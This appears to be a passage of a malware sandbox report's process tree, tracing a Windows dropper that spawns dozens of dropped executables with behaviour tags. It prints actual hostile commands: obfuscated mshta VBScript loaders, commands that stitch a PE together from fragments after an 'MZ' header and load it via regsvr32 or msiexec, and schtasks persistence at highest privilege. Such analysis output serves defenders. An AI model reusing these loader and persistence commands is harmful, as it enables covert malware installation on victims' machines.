"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:28908

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
13⤵
PID:28292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:28344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
13⤵
PID:30280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:28476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
13⤵
PID:32772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe4,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:31864

C:\Users\Admin\AppData\Local\Temp\d7-76b0c-764-e019e-13e1a7e86670c\Pefokymixu.exe
"C:\Users\Admin\AppData\Local\Temp\d7-76b0c-764-e019e-13e1a7e86670c\Pefokymixu.exe"
12⤵
PID:4792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\elsq1tfc.lvi\GcleanerEU.exe /eufive & exit
13⤵
PID:40172

C:\Users\Admin\AppData\Local\Temp\elsq1tfc.lvi\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\elsq1tfc.lvi\GcleanerEU.exe /eufive
14⤵
PID:6484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 240
15⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1916

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jrl1e20w.rxv\installer.exe /qn CAMPAIGN="654" & exit
13⤵
PID:40540

C:\Users\Admin\AppData\Local\Temp\jrl1e20w.rxv\installer.exe
C:\Users\Admin\AppData\Local\Temp\jrl1e20w.rxv\installer.exe /qn CAMPAIGN="654"
14⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:40888

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\jrl1e20w.rxv\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\jrl1e20w.rxv\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635576895 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
15⤵
- Enumerates connected drives
PID:4044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d00encpw.stq\any.exe & exit
13⤵
PID:40632

C:\Users\Admin\AppData\Local\Temp\d00encpw.stq\any.exe
C:\Users\Admin\AppData\Local\Temp\d00encpw.stq\any.exe
14⤵
PID:6608

C:\Users\Admin\AppData\Local\Temp\d00encpw.stq\any.exe
"C:\Users\Admin\AppData\Local\Temp\d00encpw.stq\any.exe" -u
15⤵
PID:4784

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
16⤵
PID:6672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ceveehsa.fm2\gcleaner.exe /mixfive & exit
13⤵
PID:40716

C:\Users\Admin\AppData\Local\Temp\ceveehsa.fm2\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\ceveehsa.fm2\gcleaner.exe /mixfive
14⤵
PID:6092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 240
15⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2332

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5jqk4lvb.nko\autosubplayer.exe /S & exit
13⤵
- Suspicious use of SetWindowsHookEx
PID:40760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ikwipork.mzk\GcleanerEU.exe /eufive & exit
13⤵
PID:28632

C:\Users\Admin\AppData\Local\Temp\ikwipork.mzk\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\ikwipork.mzk\GcleanerEU.exe /eufive
14⤵
PID:28800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 28800 -s 236
15⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:29556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5d1yxv3j.rqm\installer.exe /qn CAMPAIGN="654" & exit
13⤵
PID:28716

C:\Users\Admin\AppData\Local\Temp\5d1yxv3j.rqm\installer.exe
C:\Users\Admin\AppData\Local\Temp\5d1yxv3j.rqm\installer.exe /qn CAMPAIGN="654"
14⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:28856

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\5d1yxv3j.rqm\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\5d1yxv3j.rqm\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635602095 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
15⤵
- Enumerates connected drives
PID:29444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gzgkoegg.pmw\any.exe & exit
13⤵
PID:28764

C:\Users\Admin\AppData\Local\Temp\gzgkoegg.pmw\any.exe
C:\Users\Admin\AppData\Local\Temp\gzgkoegg.pmw\any.exe
14⤵
PID:28848

C:\Users\Admin\AppData\Local\Temp\gzgkoegg.pmw\any.exe
"C:\Users\Admin\AppData\Local\Temp\gzgkoegg.pmw\any.exe" -u
15⤵
PID:29128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vcn0efe.doh\gcleaner.exe /mixfive & exit
13⤵
PID:28820

C:\Users\Admin\AppData\Local\Temp\3vcn0efe.doh\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\3vcn0efe.doh\gcleaner.exe /mixfive
14⤵
PID:28976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 28976 -s 236
15⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:29672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ds44swka.2xp\autosubplayer.exe /S & exit
13⤵
- Suspicious use of SetWindowsHookEx
PID:28880

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
8⤵
- Creates scheduled task(s)
PID:4388

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
8⤵
- Creates scheduled task(s)
PID:1948

C:\Users\Admin\Pictures\Adobe Films\cd7hFkZpYeRMbWsNn4vCMlU3.exe
"C:\Users\Admin\Pictures\Adobe Films\cd7hFkZpYeRMbWsNn4vCMlU3.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5532

C:\Users\Admin\Pictures\Adobe Films\mjrxJWpZu4fGg6_kV7Ki27HW.exe
"C:\Users\Admin\Pictures\Adobe Films\mjrxJWpZu4fGg6_kV7Ki27HW.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5504

C:\Users\Admin\Pictures\Adobe Films\mjrxJWpZu4fGg6_kV7Ki27HW.exe
"C:\Users\Admin\Pictures\Adobe Films\mjrxJWpZu4fGg6_kV7Ki27HW.exe"
8⤵
PID:2424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 208
9⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4844

C:\Users\Admin\Pictures\Adobe Films\itNt_p6Dr9jhS5O_E2ws3fJg.exe
"C:\Users\Admin\Pictures\Adobe Films\itNt_p6Dr9jhS5O_E2ws3fJg.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5644

C:\Users\Admin\Pictures\Adobe Films\NaczrgoKg50UGIBMlCCFRRf6.exe
"C:\Users\Admin\Pictures\Adobe Films\NaczrgoKg50UGIBMlCCFRRf6.exe"
7⤵
- Executes dropped EXE
PID:5708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 280
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:400

C:\Users\Admin\Pictures\Adobe Films\caKnosJ4BSSeWUlq35ZBkYlA.exe
"C:\Users\Admin\Pictures\Adobe Films\caKnosJ4BSSeWUlq35ZBkYlA.exe"
7⤵
- Executes dropped EXE
PID:5924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 280
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe
5⤵
PID:2264

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon17bbf11fdb575d.exe
Mon17bbf11fdb575d.exe
6⤵
- Executes dropped EXE
PID:924

C:\Users\Admin\AppData\Local\Temp\is-BJ3RE.tmp\Mon17bbf11fdb575d.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BJ3RE.tmp\Mon17bbf11fdb575d.tmp" /SL5="$30084,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon17bbf11fdb575d.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2944

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon17bbf11fdb575d.exe
"C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon17bbf11fdb575d.exe" /SILENT
8⤵
- Executes dropped EXE
PID:3988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe
5⤵
PID:720

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon17332e41e6b.exe
Mon17332e41e6b.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3372

C:\Users\Admin\AppData\Roaming\2208525.exe
"C:\Users\Admin\AppData\Roaming\2208525.exe"
7⤵
- Executes dropped EXE
PID:4188

C:\Users\Admin\AppData\Roaming\8355747.exe
"C:\Users\Admin\AppData\Roaming\8355747.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5052

C:\Users\Admin\AppData\Roaming\4143041.exe
"C:\Users\Admin\AppData\Roaming\4143041.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6024

C:\Users\Admin\AppData\Roaming\7359838.exe
"C:\Users\Admin\AppData\Roaming\7359838.exe"
7⤵
- Executes dropped EXE
PID:1796

C:\Users\Admin\AppData\Roaming\810816.exe
"C:\Users\Admin\AppData\Roaming\810816.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5208

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
8⤵
PID:1844

C:\Users\Admin\AppData\Roaming\899167.exe
"C:\Users\Admin\AppData\Roaming\899167.exe"
7⤵
- Executes dropped EXE
PID:1424

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Roaming\899167.exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if """" == """" for %c in ( ""C:\Users\Admin\AppData\Roaming\899167.exe"" ) do taskkill -IM ""%~nxc"" -f " , 0, TrUE) )
8⤵
PID:5420

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Roaming\899167.exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if ""== "" for %c in ( "C:\Users\Admin\AppData\Roaming\899167.exe") do taskkill -IM "%~nxc" -f
9⤵
PID:5436

C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe
..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x
10⤵
PID:6948

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if ""/PdmLkTgclA1F1vCuy4x"" == """" for %c in ( ""C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe"" ) do taskkill -IM ""%~nxc"" -f " , 0, TrUE) )
11⤵
PID:4692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if "/PdmLkTgclA1F1vCuy4x"== "" for %c in ( "C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe") do taskkill -IM "%~nxc" -f
12⤵
PID:2252

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCriPt: clOSE ( creatEoBjecT ( "wScripT.SheLL").rUn ( "CMD /R EchO | sET /P = ""MZ"" > GGEDXaPF.3N & COPy /y /b GGEDXaPF.3N + OS9L8LWJ.8 + OXk9Xe.U5Q+ jD6c~d.d+ xtSWZV.KD+KhEL.5i ..\cKW6.mXo & deL /q *& StArT regsvr32 -u ..\cKW6.mXo -s " , 0, True))
11⤵
PID:2560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R EchO | sET /P = "MZ" > GGEDXaPF.3N & COPy /y /b GGEDXaPF.3N + OS9L8LWJ.8 + OXk9Xe.U5Q+jD6c~d.d+ xtSWZV.KD+KhEL.5i ..\cKW6.mXo &deL /q *&StArT regsvr32 -u ..\cKW6.mXo -s
12⤵
PID:5304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EchO "
13⤵
PID:6540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>GGEDXaPF.3N"
13⤵
PID:3680

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 -u ..\cKW6.mXo -s
13⤵
- Loads dropped DLL
PID:1304

C:\Windows\SysWOW64\taskkill.exe
taskkill -IM "899167.exe" -f
10⤵
- Kills process with taskkill
PID:880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe
5⤵
PID:3664

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon174a6c5f1664f.exe
Mon174a6c5f1664f.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3528

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon174a6c5f1664f.exe
C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon174a6c5f1664f.exe
7⤵
- Executes dropped EXE
PID:2556

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon174a6c5f1664f.exe
C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon174a6c5f1664f.exe
7⤵
- Executes dropped EXE
PID:2520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe
5⤵
PID:3052

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon1708beae021a5ff.exe
Mon1708beae021a5ff.exe
6⤵
- Executes dropped EXE
PID:4804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe
5⤵
PID:4984

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon1727c156c4abcec.exe
Mon1727c156c4abcec.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3348

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon1727c156c4abcec.exe
C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon1727c156c4abcec.exe
7⤵
- Executes dropped EXE
PID:808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe
5⤵
PID:4960

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon17a0d8ec302e.exe
Mon17a0d8ec302e.exe
6⤵
- Executes dropped EXE
PID:1648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe
5⤵
PID:4132

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon178d8e5d06822.exe
Mon178d8e5d06822.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:780

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
7⤵
- Executes dropped EXE
PID:460

C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
8⤵
- Executes dropped EXE
PID:752

C:\Users\Admin\AppData\Roaming\8939255.exe
"C:\Users\Admin\AppData\Roaming\8939255.exe"
9⤵
PID:6352

C:\Users\Admin\AppData\Roaming\1451086.exe
"C:\Users\Admin\AppData\Roaming\1451086.exe"
9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6848

C:\Users\Admin\AppData\Roaming\7011155.exe
"C:\Users\Admin\AppData\Roaming\7011155.exe"
9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5404

C:\Users\Admin\AppData\Roaming\3982319.exe
"C:\Users\Admin\AppData\Roaming\3982319.exe"
9⤵
PID:5376

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Roaming\3982319.exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if """" == """" for %c in ( ""C:\Users\Admin\AppData\Roaming\3982319.exe"" ) do taskkill -IM ""%~nxc"" -f " , 0, TrUE) )
10⤵
PID:6816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Roaming\3982319.exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if ""== "" for %c in ( "C:\Users\Admin\AppData\Roaming\3982319.exe") do taskkill -IM "%~nxc" -f
11⤵
PID:880

C:\Windows\SysWOW64\taskkill.exe
taskkill -IM "3982319.exe" -f
12⤵
- Kills process with taskkill
PID:5040

C:\Users\Admin\AppData\Roaming\4139395.exe
"C:\Users\Admin\AppData\Roaming\4139395.exe"
9⤵
- Suspicious behavior: SetClipboardViewer
PID:3900

C:\Users\Admin\AppData\Roaming\227470.exe
"C:\Users\Admin\AppData\Roaming\227470.exe"
9⤵
PID:6616

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
8⤵
- Executes dropped EXE
PID:5232

C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
8⤵
- Executes dropped EXE
PID:5876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5876 -s 280
9⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3468

C:\Users\Admin\AppData\Local\Temp\chrome.exe
"C:\Users\Admin\AppData\Local\Temp\chrome.exe"
8⤵
- Executes dropped EXE
PID:6088

C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
8⤵
- Executes dropped EXE
PID:5212

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
8⤵
- Executes dropped EXE
PID:1696

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
9⤵
PID:4476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
10⤵
PID:6764

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "search_hyperfs_206.exe"
11⤵
- Kills process with taskkill
PID:2376

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
11⤵
PID:6672

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
12⤵
PID:6552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
13⤵
PID:6632

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
12⤵
PID:5396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
13⤵
PID:6644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
14⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
14⤵
PID:6480

C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
14⤵
- Loads dropped DLL
PID:3640

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
8⤵
- Executes dropped EXE
PID:5948

C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe
"C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"
8⤵
- Executes dropped EXE
PID:780

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
8⤵
- Loads dropped DLL
PID:6244

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
9⤵
- Loads dropped DLL
